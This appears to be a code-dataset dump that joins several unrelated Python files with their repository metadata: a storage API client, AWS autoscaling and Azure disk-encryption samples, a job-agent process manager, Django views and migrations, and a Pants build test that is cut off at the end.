# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_group_quotas(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_group_quotas_with_http_info(**kwargs)
else:
(data) = self.update_group_quotas_with_http_info(**kwargs)
return data
def update_group_quotas_with_http_info(self, **kwargs):
"""
Update existing group quotas
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_group_quotas_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] names: A comma-separated list of resource names. This cannot be provided together with the ids query parameters.
:param list[str] file_system_names: A comma-separated list of file system names. If after filtering, there is not at least one resource that matches each of the elements of names, then an error is returned.
:param list[str] gids: A comma-separated list of group IDs. If after filtering, there is not at least one resource that matches each of the elements of group IDs, then an error is returned. This cannot be provided together with group_names query parameter.
:param list[str] group_names: A comma-separated list of group names. If after filtering, there is not at least one resource that matches each of the elements of group names, then an error is returned. This cannot be provided together with gids query parameter.
:param QuotasGroup quota:
:return: QuotasGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['names', 'file_system_names', 'gids', 'group_names', 'quota']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_group_quotas" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'names' in params:
query_params.append(('names', params['names']))
collection_formats['names'] = 'csv'
if 'file_system_names' in params:
query_params.append(('file_system_names', params['file_system_names']))
collection_formats['file_system_names'] = 'csv'
if 'gids' in params:
query_params.append(('gids', params['gids']))
collection_formats['gids'] = 'csv'
if 'group_names' in params:
query_params.append(('group_names', params['group_names']))
collection_formats['group_names'] = 'csv'
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'quota' in params:
body_params = params['quota']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['AuthTokenHeader']
return self.api_client.call_api('/1.8/quotas/groups', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='QuotasGroupResponse',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
|
[
"azaria.zornberg@purestorage.com"
] |
azaria.zornberg@purestorage.com
|
9eedcc25d03a6a9bc42984a3f718564309407905
|
48b50c0b525956fa2267b00021d52ca5ef715e81
|
/02-notifon/scale-up.py
|
061c708974183ea6f322a4a2c16cd5a2363eb13f
|
[] |
no_license
|
cashpole/automating-aws-with-python
|
2bcdb97fa4d7768a1a4ac581b16935262a20b27c
|
fb6bcf6da93f80fbd11944be080e7a34da993f3d
|
refs/heads/master
| 2022-12-08T20:09:59.514534
| 2019-07-01T19:18:07
| 2019-07-01T19:18:07
| 186,532,329
| 0
| 0
| null | 2022-09-08T08:22:31
| 2019-05-14T02:47:02
|
Python
|
UTF-8
|
Python
| false
| false
| 224
|
py
|
# coding: utf-8
import boto3
session = boto3.Session(profile_name='pythonAutomation')
as_client = session.client('autoscaling')
as_client.execute_policy(AutoScalingGroupName='Notifon Example Group', PolicyName='Scale Up')
|
[
"cashpole@hotmail.com"
] |
cashpole@hotmail.com
|
086aebcfe4c9dc2fee2d104a55ae67c41c0a5a78
|
a9c9316fe425dac911ca6b3e33d2c76c48e428b3
|
/maro/cli/process/agent/job_agent.py
|
9949099a4a06c3dc64c4c01c928c20c7d4ebcf1d
|
[
"MIT",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
00mjk/maro
|
a64601d5c43a7e6808b1cab1c19be15595395ce1
|
05a64a67fee7d2c4198a57593c464d64e0a8ce7f
|
refs/heads/master
| 2023-03-11T16:58:54.043497
| 2021-02-10T15:31:58
| 2021-02-10T15:31:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,593
|
py
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import multiprocessing as mp
import os
import subprocess
import time
import psutil
import redis
from maro.cli.process.utils.details import close_by_pid, get_child_pid, load_setting_info
from maro.cli.utils.params import LocalPaths, ProcessRedisName
class PendingJobAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
def run(self):
while True:
self._check_pending_ticket()
time.sleep(self.check_interval)
def _check_pending_ticket(self):
# Check pending job ticket
pending_jobs = self.redis_connection.lrange(ProcessRedisName.PENDING_JOB_TICKETS, 0, -1)
for job_name in pending_jobs:
job_detail = json.loads(self.redis_connection.hget(ProcessRedisName.JOB_DETAILS, job_name))
running_jobs_length = self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB)
parallel_level = self.redis_connection.hget(ProcessRedisName.SETTING, "parallel_level")
# Start pending job only if current running job's number less than parallel level.
if int(parallel_level) > running_jobs_length:
self._start_job(job_detail)
self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
def _start_job(self, job_details: dict):
command_pid_list = []
for component_type, command_info in job_details["components"].items():
component_number = command_info["num"]
component_command = f"JOB_NAME={job_details['name']} " + command_info["command"]
for number in range(component_number):
job_local_path = os.path.expanduser(f"{LocalPaths.MARO_PROCESS}/{job_details['name']}")
if not os.path.exists(job_local_path):
os.makedirs(job_local_path)
with open(f"{job_local_path}/{component_type}_{number}.log", "w") as log_file:
proc = subprocess.Popen(component_command, shell=True, stdout=log_file)
command_pid = get_child_pid(proc.pid)
command_pid_list.append(command_pid)
self.redis_connection.hset(ProcessRedisName.RUNNING_JOB, job_details["name"], json.dumps(command_pid_list))
class JobTrackingAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
self._shutdown_count = 0
self._countdown = self.redis_connection.hget(ProcessRedisName.SETTING, "agent_countdown")
def run(self):
while True:
self._check_job_status()
time.sleep(self.check_interval)
keep_alive = int(self.redis_connection.hget(ProcessRedisName.SETTING, "keep_agent_alive"))
if not keep_alive:
self._close_agents()
def _check_job_status(self):
running_jobs = self.redis_connection.hgetall(ProcessRedisName.RUNNING_JOB)
running_jobs = {job_name.decode(): json.loads(pid_list) for job_name, pid_list in running_jobs.items()}
for running_job, pid_list in running_jobs.items():
# Check pid status
still_alive = False
for pid in pid_list:
if psutil.pid_exists(pid):
still_alive = True
# Update if no pid exists
if not still_alive:
self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, running_job)
def _close_agents(self):
if (
not self.redis_connection.hlen(ProcessRedisName.RUNNING_JOB) and
not self.redis_connection.llen(ProcessRedisName.PENDING_JOB_TICKETS)
):
self._shutdown_count += 1
else:
self._shutdown_count = 0
if self._shutdown_count >= self._countdown:
agent_pid = int(self.redis_connection.hget(ProcessRedisName.SETTING, "agent_pid"))
# close agent
close_by_pid(pid=agent_pid, recursive=True)
# Set agent status to 0
self.redis_connection.hset(ProcessRedisName.SETTING, "agent_status", 0)
class KilledJobAgent(mp.Process):
def __init__(self, redis_connection, check_interval: int = 60):
super().__init__()
self.redis_connection = redis_connection
self.check_interval = check_interval
def run(self):
while True:
self._check_kill_ticket()
time.sleep(self.check_interval)
def _check_kill_ticket(self):
# Check pending job ticket
killed_job_names = self.redis_connection.lrange(ProcessRedisName.KILLED_JOB_TICKETS, 0, -1)
for job_name in killed_job_names:
if self.redis_connection.hexists(ProcessRedisName.RUNNING_JOB, job_name):
pid_list = json.loads(self.redis_connection.hget(ProcessRedisName.RUNNING_JOB, job_name))
close_by_pid(pid=pid_list, recursive=False)
self.redis_connection.hdel(ProcessRedisName.RUNNING_JOB, job_name)
else:
self.redis_connection.lrem(ProcessRedisName.PENDING_JOB_TICKETS, 0, job_name)
self.redis_connection.lrem(ProcessRedisName.KILLED_JOB_TICKETS, 0, job_name)
class MasterAgent:
def __init__(self):
setting_info = load_setting_info()
self.check_interval = setting_info["check_interval"]
self.redis_connection = redis.Redis(
host=setting_info["redis_info"]["host"],
port=setting_info["redis_info"]["port"]
)
self.redis_connection.hset(ProcessRedisName.SETTING, "agent_pid", os.getpid())
def start(self) -> None:
"""Start agents."""
pending_job_agent = PendingJobAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
pending_job_agent.start()
killed_job_agent = KilledJobAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
killed_job_agent.start()
job_tracking_agent = JobTrackingAgent(
redis_connection=self.redis_connection,
check_interval=self.check_interval
)
job_tracking_agent.start()
if __name__ == "__main__":
master_agent = MasterAgent()
master_agent.start()
|
[
"noreply@github.com"
] |
noreply@github.com
|
76401ac4e722d051809095cd5b95aa29888ec01d
|
8485ac621de45db5db3a1faf248690650d951258
|
/tracker.py
|
d39f4122960155450e4719a98a2d22a93bca568b
|
[] |
no_license
|
gerardo8al/portfolio_tracker
|
610e538dfc315c870a6838d8ea68bf3766e8b838
|
5c27e71c00f1d729484afd6b8366b069c98246a4
|
refs/heads/master
| 2020-03-12T17:30:26.253308
| 2018-04-24T20:21:00
| 2018-04-24T20:21:00
| 130,737,666
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 700
|
py
|
from constants import *
import csv
import urllib.request
import json
def send_get_request(url):
response = urllib.request.urlopen(url)
json_back = response.read()
json_back = json.loads(json_back.decode('utf-8'))
#json_pretty_print(json_back)
return json_back
def json_pretty_print(parsed):
print(json.dumps(parsed, indent=4, sort_keys=True))
def main():
#The request returns a json that contains the info for
#all the tickers in exchange.
json_back = send_get_request(URL)
with open(CSV, 'rt') as f:
reader=csv.reader(f)
for row in reader:
ticker = row[0]
quantity = row[1]
if __name__ == "__main__":
main()
|
[
"gerardo8a@gmail.com"
] |
gerardo8a@gmail.com
|
b0514a0533d844c12afb5368772ef5d43d163ea9
|
490ac0cbeb1436a642d236381b277b07a86aff2a
|
/blog/migrations/0001_initial.py
|
19f8b37b13b8007b355b1319c3edd370ddfaf805
|
[] |
no_license
|
Marshall210/My_site
|
8f445ce073d75a6b3675c7876288ef6627b3859d
|
8130394070c382af510e2912772b0c9e830e619c
|
refs/heads/master
| 2020-07-21T11:08:50.900237
| 2019-09-22T14:12:17
| 2019-09-22T14:12:17
| 206,843,651
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 986
|
py
|
# Generated by Django 2.2.5 on 2019-09-20 18:21
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200)),
('text', models.TextField()),
('created_date', models.DateTimeField(default=django.utils.timezone.now)),
('published_date', models.DateTimeField(blank=True, null=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"tymchenko99978@gmail.com"
] |
tymchenko99978@gmail.com
|
6b585b2fcc4e1b39e9ed6dbd006f975bf82030b4
|
0fe88e2bcf3015f6b54508b2304e9833bc7f7eb2
|
/skadi/index/__init__.py
|
df5fab35467894641108704a015acd8e8ae77318
|
[
"MIT"
] |
permissive
|
gwvent/skadi
|
3d73ba6efbc32065599d2e0773f4783342cf5482
|
0b5c983a0a17e57d70fb64b2401caba40d43679a
|
refs/heads/master
| 2021-01-17T22:54:38.196692
| 2013-08-20T08:04:25
| 2013-08-20T08:04:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,355
|
py
|
import math
VI_BIT_MAX = 35
VI_SHIFT = 7
VI_MAX_BYTES = int(math.ceil(float(VI_BIT_MAX) / VI_SHIFT))
VI_MASK = (1 << 32) - 1
class InvalidVarint(Exception):
pass
# Algorithm "borrowed" from Google protobuf library.
def peek_varint(stream):
peeked = stream.peek(VI_MAX_BYTES)
size, value, shift = 0, 0, 0
while True:
if size >= len(peeked):
raise EOFError()
byte = ord(peeked[size])
size += 1
value |= ((byte & 0x7f) << shift)
shift += VI_SHIFT
if not (byte & 0x80):
value &= VI_MASK
return value, size
if shift >= VI_BIT_MAX:
raise InvalidVarint
def read_varint(stream):
value, size = peek_varint(stream)
stream.read(size)
return value
class InvalidProtobufMessage(Exception):
pass
class Index(object):
def __init__(self, iterable):
self.peeks = list(iterable)
def __iter__(self):
return iter(self.peeks)
def find(self, cls):
return next(iter(filter(lambda p: p.cls == cls, self.peeks)), None)
def find_all(self, cls):
return filter(lambda p: p.cls == cls, self.peeks)
def find_behind(self, offset):
return filter(lambda p: p.offset < offset, self.peeks)
def find_at(self, offset):
return filter(lambda p: p.offset == offset, self.peeks)
def find_ahead(self, offset):
return filter(lambda p: p.offset > offset, self.peeks)
|
[
"joshua.a.morris@gmail.com"
] |
joshua.a.morris@gmail.com
|
f9911ba1ef369f850f1fe229f1de64f2c3a20c93
|
d49fd2040235f30e5701a997b2afcc4b123b82f1
|
/neighbourhood/views.py
|
513fb809d73e570ef76ba59f7bf262d4e1235690
|
[
"MIT"
] |
permissive
|
ClintonClin/neighbourhood
|
830b9bd0b7e27308b54fedb432877191e6a3585e
|
509ba9702d67e5636aee9d754eaa41e57a52b61a
|
refs/heads/master
| 2022-12-11T08:23:08.690787
| 2019-02-28T10:57:05
| 2019-02-28T10:57:05
| 165,234,843
| 0
| 0
| null | 2022-12-08T03:00:45
| 2019-01-11T11:43:06
|
Python
|
UTF-8
|
Python
| false
| false
| 7,746
|
py
|
from django.shortcuts import render, redirect
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.contrib.auth.decorators import login_required
from django.core.exceptions import ObjectDoesNotExist
from .models import neighbourhood, healthservices, Business, Health, Authorities, BlogPost, Profile, Notifications, Comment
from .email import send_priority_email
from .forms import notificationsForm, ProfileForm, BlogPostForm, BusinessForm, CommentForm
from decouple import config, Csv
import datetime as dt
from django.http import JsonResponse
import json
from django.db.models import Q
from django.contrib.auth.models import User
from rest_framework.response import Response
from rest_framework.views import APIView
# Create your views here.
def index(request):
try:
if not request.user.is_authenticated:
return redirect('/accounts/login/')
current_user = request.user
profile = Profile.objects.get(username=current_user)
except ObjectDoesNotExist:
return redirect('create-profile')
return render(request, 'index.html')
@login_required(login_url='/accounts/login/')
def notification(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
all_notifications = Notifications.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'notifications.html', {"notifications": all_notifications})
@login_required(login_url='/accounts/login/')
def health(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
healthservices = Health.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'health.html', {"healthservices": healthservices})
@login_required(login_url='/accounts/login/')
def blog(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
blogposts = BlogPost.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'blog.html', {"blogposts": blogposts})
@login_required(login_url='/accounts/login/')
def businesses(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
businesses = Business.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'business.html', {"businesses": businesses})
@login_required(login_url='/accounts/login/')
def authorities(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
authorities = Authorities.objects.filter(neighbourhood=profile.neighbourhood)
return render(request, 'security.html', {"authorities": authorities})
@login_required(login_url='/accounts/login/')
def view_blog(request, id):
current_user = request.user
try:
comments = Comment.objects.filter(post_id=id)
except:
comments = []
blog = BlogPost.objects.get(id=id)
if request.method == 'POST':
form = CommentForm(request.POST, request.FILES)
if form.is_valid():
comment = form.save(commit=False)
comment.username = current_user
comment.post = blog
comment.save()
else:
form = CommentForm()
return render(request, 'view_blog.html', {"blog": blog, "form": form, "comments": comments})
@login_required(login_url='/accounts/login/')
def user_profile(request, username):
user = User.objects.get(username=username)
profile = Profile.objects.get(username=user)
return render(request, 'profile.html', {"profile": profile})
@login_required(login_url='/accounts/login/')
def my_profile(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
return render(request, 'user_profile.html', {"profile": profile})
@login_required(login_url='/accounts/login/')
def new_blogpost(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = BlogPostForm(request.POST, request.FILES)
if form.is_valid():
blogpost = form.save(commit=False)
blogpost.username = current_user
blogpost.neighbourhood = profile.neighbourhood
blogpost.avatar = profile.avatar
blogpost.save()
return HttpResponseRedirect('/blog')
else:
form = BlogPostForm()
return render(request, 'blogpost_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def new_business(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = BusinessForm(request.POST, request.FILES)
if form.is_valid():
business = form.save(commit=False)
business.owner = current_user
business.neighbourhood = profile.neighbourhood
business.save()
return HttpResponseRedirect('/business')
else:
form = BusinessForm()
return render(request, 'business_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def create_profile(request):
current_user = request.user
if request.method == "POST":
form = ProfileForm(request.POST, request.FILES)
if form.is_valid():
profile = form.save(commit=False)
profile.username = current_user
profile.save()
return HttpResponseRedirect('/')
else:
form = ProfileForm()
return render(request, 'profile_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def new_notification(request):
current_user = request.user
profile = Profile.objects.get(username=current_user)
if request.method == "POST":
form = notificationsForm(request.POST, request.FILES)
if form.is_valid():
notification = form.save(commit=False)
notification.author = current_user
notification.neighbourhood = profile.neighbourhood
notification.save()
# if notification.priority == 'High Priority':
# send_priority_email(profile.name, profile.email, notification.title, notification.notification, notification.author, notification.neighbourhood)
return HttpResponseRedirect('/notifications')
else:
form = notificationsForm()
return render(request, 'notifications_form.html', {"form": form})
@login_required(login_url='/accounts/login/')
def update_profile(request):
current_user = request.user
if request.method == "POST":
instance = Profile.objects.get(username=current_user)
form = ProfileForm(request.POST, request.FILES, instance=instance)
if form.is_valid():
profile = form.save(commit=False)
profile.username = current_user
profile.save()
return redirect('Index')
elif Profile.objects.get(username=current_user):
profile = Profile.objects.get(username=current_user)
form = ProfileForm(instance=profile)
else:
form = ProfileForm()
return render(request, 'update_profile.html', {"form": form})
@login_required(login_url='/accounts/login/')
def search_results(request):
if 'blog' in request.GET and request.GET["blog"]:
search_term = request.GET.get("blog")
searched_blogposts = BlogPost.search_blogpost(search_term)
message = f"{search_term}"
print(searched_blogposts)
return render(request, 'search.html', {"message": message, "blogs": searched_blogposts})
else:
message = "You haven't searched for anything"
return render(request, 'search.html', {"message": message})
|
[
"clintonclin00@gmail.com"
] |
clintonclin00@gmail.com
|
70044d57fced0a79461899cfe23e9212aef8c5de
|
1dafc27c7f754f936135ef8614ab291854034022
|
/samples/compute/disable_manage_disk_encryption_set.py
|
2d93c612d3dc60bada457e5fdc07c1f45c83cea8
|
[
"MIT"
] |
permissive
|
ArunAyyagari/azure-samples-python-management
|
6f329b35e71939a5539e164e55097a15c6d7dea6
|
cfe187ce49aad35d84d0a61ba6d3ef156095ff0c
|
refs/heads/master
| 2022-08-29T03:10:47.894017
| 2020-05-25T02:32:18
| 2020-05-25T02:32:18
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,563
|
py
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
from dateutil import parser as date_parse
from azure.identity import DefaultAzureCredentials
from azure.keyvault.keys import KeyClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.keyvault import KeyVaultManagementClient
from azure.mgmt.resource import ResourceManagementClient
def main():
SUBSCRIPTION_ID = os.environ.get("SUBSCRIPTION_ID", None)
TENANT_ID = os.environ.get("AZURE_TENANT_ID", None)
DISK_ENCRYPTION_SET_NAME = "diskencryptionsetxxx"
GROUP_NAME = "testgroupx"
KEY_VAULT = "keyvaultxyzxxxxx"
# Create client
# For other authentication approaches, please see: https://pypi.org/project/azure-identity/
resource_client = ResourceManagementClient(
credential=DefaultAzureCredentials(),
subscription_id=SUBSCRIPTION_ID
)
compute_client = ComputeManagementClient(
credential=DefaultAzureCredentials(),
subscription_id=SUBSCRIPTION_ID
)
keyvault_client = KeyVaultManagementClient(
credentials=DefaultAzureCredentials(),
subscription_id=SUBSCRIPTION_ID
)
# Create resource group
resource_client.resource_groups.create_or_update(
GROUP_NAME,
{"location": "eastus"}
)
# Create key
vault = keyvault_client.vaults.create_or_update(
GROUP_NAME,
KEY_VAULT,
{
'location': "eastus",
'properties': {
'sku': {
'name': 'standard'
},
'tenant_id': TENANT_ID,
"access_policies": [
{
"tenant_id": TENANT_ID,
"object_id": "123743cc-88ef-49ee-920e-13958fe5697d",
"permissions": {
"keys": [
"encrypt",
"decrypt",
"wrapKey",
"unwrapKey",
"sign",
"verify",
"get",
"list",
"create",
"update",
"import",
"delete",
"backup",
"restore",
"recover",
"purge"
]
}
}
],
'enabled_for_disk_encryption': True,
}
}
).result()
key_client = KeyClient(vault.properties.vault_uri, DefaultAzureCredentials())
expires_on = date_parse.parse("2050-02-02T08:00:00.000Z")
key = key_client.create_key(
"testkey",
"RSA",
size=2048,
expires_on=expires_on
)
# Create disk encryption set
encryption_set = compute_client.disk_encryption_sets.begin_create_or_update(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME,
{
"location": "eastus",
"identity": {
"type": "SystemAssigned"
},
"active_key": {
"source_vault": {
"id": vault.id
},
"key_url": key.id
}
}
).result()
print("Create disk encryption set:\n{}".format(encryption_set))
# Get disk encrytion set
encryption_set = compute_client.disk_encryption_sets.get(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME
)
print("Get disk encryption set:\n{}".format(encryption_set))
# Update disk encryption set
encryption_set = compute_client.disk_encryption_sets.begin_update(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME,
{
"active_key": {
"source_vault": {
"id": vault.id
},
"key_url": key.id
},
"tags": {
"department": "Development",
"project": "Encryption"
}
}
).result()
print("Update disk encryption set:\n{}".format(encryption_set))
# Delete disk encryption set
compute_client.disk_encryption_sets.begin_delete(
GROUP_NAME,
DISK_ENCRYPTION_SET_NAME
)
print("Delete disk encryption set.\n")
# Delete Group
resource_client.resource_groups.begin_delete(
GROUP_NAME
).result()
if __name__ == "__main__":
main()
|
[
"sunkaihuisos@gmail.com"
] |
sunkaihuisos@gmail.com
|
208a1844a81ead0571afc60c1414be53b9b0f78c
|
05352c29e844705f02d65526343eea9b486f8bd7
|
/src/python/pants/backend/python/rules/run_setup_py_test.py
|
001faa56b7b0e7fd0e62305736c4abe5951844de
|
[
"Apache-2.0"
] |
permissive
|
DoN-SultaN/pants
|
af2557de1178faaf73eed0a5a32e8f6fd34d2169
|
5cb5379003a0674c51f9a53f582cf690eddfaf45
|
refs/heads/master
| 2022-10-15T04:18:54.759839
| 2020-06-13T10:04:21
| 2020-06-13T10:04:21
| 272,089,524
| 1
| 0
|
Apache-2.0
| 2020-06-13T21:36:50
| 2020-06-13T21:36:49
| null |
UTF-8
|
Python
| false
| false
| 27,011
|
py
|
# Copyright 2019 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import json
import textwrap
from typing import Iterable, Type
import pytest
from pants.backend.python.python_artifact import PythonArtifact
from pants.backend.python.rules.run_setup_py import (
AmbiguousOwnerError,
AncestorInitPyFiles,
DependencyOwner,
ExportedTarget,
ExportedTargetRequirements,
InvalidEntryPoint,
InvalidSetupPyArgs,
NoOwnerError,
OwnedDependencies,
OwnedDependency,
SetupPyChroot,
SetupPyChrootRequest,
SetupPySources,
SetupPySourcesRequest,
generate_chroot,
get_ancestor_init_py,
get_exporting_owner,
get_owned_dependencies,
get_requirements,
get_sources,
validate_args,
)
from pants.backend.python.target_types import PythonBinary, PythonLibrary, PythonRequirementLibrary
from pants.build_graph.build_file_aliases import BuildFileAliases
from pants.core.target_types import Resources
from pants.core.util_rules.determine_source_files import rules as determine_source_files_rules
from pants.core.util_rules.strip_source_roots import rules as strip_source_roots_rules
from pants.engine.addresses import Address
from pants.engine.fs import Snapshot
from pants.engine.internals.scheduler import ExecutionError
from pants.engine.rules import RootRule
from pants.engine.selectors import Params
from pants.engine.target import Target, Targets, WrappedTarget
from pants.python.python_requirement import PythonRequirement
from pants.source.source_root import SourceRootConfig
from pants.testutil.option.util import create_options_bootstrapper
from pants.testutil.subsystem.util import init_subsystem
from pants.testutil.test_base import TestBase
_namespace_decl = "__import__('pkg_resources').declare_namespace(__name__)"
class TestSetupPyBase(TestBase):
@classmethod
def alias_groups(cls) -> BuildFileAliases:
return BuildFileAliases(
objects={"python_requirement": PythonRequirement, "setup_py": PythonArtifact}
)
@classmethod
def target_types(cls):
return [PythonBinary, PythonLibrary, PythonRequirementLibrary, Resources]
def tgt(self, addr: str) -> Target:
return self.request_single_product(WrappedTarget, Params(Address.parse(addr))).target
def init_source_root():
init_subsystem(SourceRootConfig, options={"source": {"root_patterns": ["src/python"]}})
class TestGenerateChroot(TestSetupPyBase):
@classmethod
def rules(cls):
return super().rules() + [
generate_chroot,
get_sources,
get_requirements,
get_ancestor_init_py,
get_owned_dependencies,
get_exporting_owner,
RootRule(SetupPyChrootRequest),
*determine_source_files_rules(),
*strip_source_roots_rules(),
]
def assert_chroot(self, expected_files, expected_setup_kwargs, addr):
chroot = self.request_single_product(
SetupPyChroot,
Params(
SetupPyChrootRequest(ExportedTarget(self.tgt(addr)), py2=False),
create_options_bootstrapper(args=["--source-root-patterns=src/python"]),
),
)
snapshot = self.request_single_product(Snapshot, Params(chroot.digest))
assert sorted(expected_files) == sorted(snapshot.files)
kwargs = json.loads(chroot.setup_keywords_json)
assert expected_setup_kwargs == kwargs
def assert_error(self, addr: str, exc_cls: Type[Exception]):
with pytest.raises(ExecutionError) as excinfo:
self.request_single_product(
SetupPyChroot,
Params(
SetupPyChrootRequest(ExportedTarget(self.tgt(addr)), py2=False),
create_options_bootstrapper(args=["--source-root-patterns=src/python"]),
),
)
ex = excinfo.value
assert len(ex.wrapped_exceptions) == 1
assert type(ex.wrapped_exceptions[0]) == exc_cls
def test_generate_chroot(self) -> None:
init_source_root()
self.create_file(
"src/python/foo/bar/baz/BUILD",
"python_library(provides=setup_py(name='baz', version='1.1.1'))",
)
self.create_file("src/python/foo/bar/baz/baz.py", "")
self.create_file(
"src/python/foo/qux/BUILD",
textwrap.dedent(
"""
python_library()
python_binary(name="bin", entry_point="foo.qux.bin")
"""
),
)
self.create_file("src/python/foo/qux/__init__.py", "")
self.create_file("src/python/foo/qux/qux.py", "")
self.create_file("src/python/foo/resources/BUILD", 'resources(sources=["js/code.js"])')
self.create_file("src/python/foo/resources/js/code.js", "")
self.create_file(
"src/python/foo/BUILD",
textwrap.dedent(
"""
python_library(
dependencies=[
'src/python/foo/bar/baz',
'src/python/foo/qux',
'src/python/foo/resources',
],
provides=setup_py(
name='foo', version='1.2.3'
).with_binaries(
foo_main='src/python/foo/qux:bin'
)
)
"""
),
)
self.create_file("src/python/foo/__init__.py", _namespace_decl)
self.create_file("src/python/foo/foo.py", "")
self.assert_chroot(
[
"src/foo/qux/__init__.py",
"src/foo/qux/qux.py",
"src/foo/resources/js/code.js",
"src/foo/__init__.py",
"src/foo/foo.py",
"setup.py",
"MANIFEST.in",
],
{
"name": "foo",
"version": "1.2.3",
"package_dir": {"": "src"},
"packages": ["foo", "foo.qux"],
"namespace_packages": ["foo"],
"package_data": {"foo": ["resources/js/code.js"]},
"install_requires": ["baz==1.1.1"],
"entry_points": {"console_scripts": ["foo_main=foo.qux.bin"]},
},
"src/python/foo",
)
def test_invalid_binary(self) -> None:
init_source_root()
self.create_file(
"src/python/invalid_binary/BUILD",
textwrap.dedent(
"""
python_library(name='not_a_binary', sources=[])
python_binary(name='no_entrypoint')
python_library(
name='invalid_bin1',
sources=[],
provides=setup_py(
name='invalid_bin1', version='1.1.1'
).with_binaries(foo=':not_a_binary')
)
python_library(
name='invalid_bin2',
sources=[],
provides=setup_py(
